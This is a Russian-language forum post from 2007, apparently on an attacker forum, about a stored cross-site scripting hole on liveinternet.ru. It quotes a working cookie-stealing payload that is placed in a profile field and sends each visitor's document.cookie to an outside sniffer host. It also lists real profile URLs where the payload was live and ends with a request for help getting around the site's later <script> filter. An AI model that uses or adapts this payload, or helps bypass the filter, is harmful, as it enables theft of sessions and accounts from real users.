01.03.2007, 00:39
|
|
Новичок
Регистрация: 05.05.2006
Сообщений: 5
С нами:
10535097
Репутация:
0
|
|
Сообщение от InferNo23
Вот нашол активную xss:
когда регимся, вводим в поле "О новом дневнике - в двух словах"
Код:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
.
потом все кто помотрит ваш профиль отдаст куки...
Примеры:
http://www.liveinternet.ru/users/hello2all/profile/ - тут отдадите куки
http://www.liveinternet.ru/users/nokia1/profile/ - алерт.
А что дальше делать?
Куки отправляются на снифф общий? если да, то я не могу найти его лог =/
Зы: или это уже вообще не катит?
Сообщение от re-arranged
ребят, а дырку, по ходу, уже прикрыли. мне почему-то кажется, что тут нетрудно будет другую найти, тут просто <script> фильтруется. *вышесказанное было написано без моска, ибо я в этом деле не очень разбираюсь =)*.
может кто-нибудь башковитый и рукастый сможет сообразить в чем тут дело? помогите, пожалуйста.
+1 =)
Последний раз редактировалось DeadFire; 01.03.2007 в 00:43..
|
|
|